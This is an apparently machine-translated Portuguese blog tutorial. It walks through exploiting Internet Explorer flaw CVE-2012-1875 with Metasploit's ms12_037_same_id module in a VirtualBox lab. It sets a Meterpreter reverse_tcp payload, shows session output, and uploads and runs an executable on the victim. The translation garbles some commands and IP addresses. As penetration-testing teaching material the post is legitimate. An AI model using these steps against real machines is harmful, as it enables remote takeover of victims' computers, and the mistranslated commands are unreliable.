http://skamason.com/7b9R

http://skamason.com/7b9R

sexta-feira, 1 de fevereiro de 2013

Exploit para a vulnerabilidade do Internet Explorer mesmo ID (CVE-2012-1875):

Requisitos:
  • Alvo OS: XP3
  • Atacante OS: Backtrack ou qualquer PenTesting Distros
Como de costume, você tem que criar duas máquinas virtuais em seu VirtualBox.

Preparando sistema da vítima:
Instale o XP3 em um dos VM. Alterar o adaptador de rede da VM para o Host-somente o adaptador. (Se você não sabe o que estou falando, então use este manual do Virtualbox )

Preparando o sistema Atacante:
Atualizar os módulos do Metasploit, digitando o seguinte comando no Terminal:
msfupdate

Ou você pode baixar o " ms12_037_same_id.rb módulo 'e pasta neste diretório "opt/metasploit/msf3/modules/exploits/windows/browser / /"

Configurar as definições para a sua exploração em Metasploit:
Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.

Tipo "use exploit/windows/browser/ms12_037_same_id" no console.

Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Ok, vamos lançar o exploit.

Digite "proeza" no console.


Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/".

Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:

[*] Cliente requerente: /
[*] Usando o JRE ROP
[*] Enviando html
[*] Envio de estágio (752.128 bytes) para 192.168.56.12
[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.

Agora, você pode controlar o sistema vítima de computador usando Meterpreter.

Por exemplo:

'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo.

'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.

Nenhum comentário:

Postar um comentário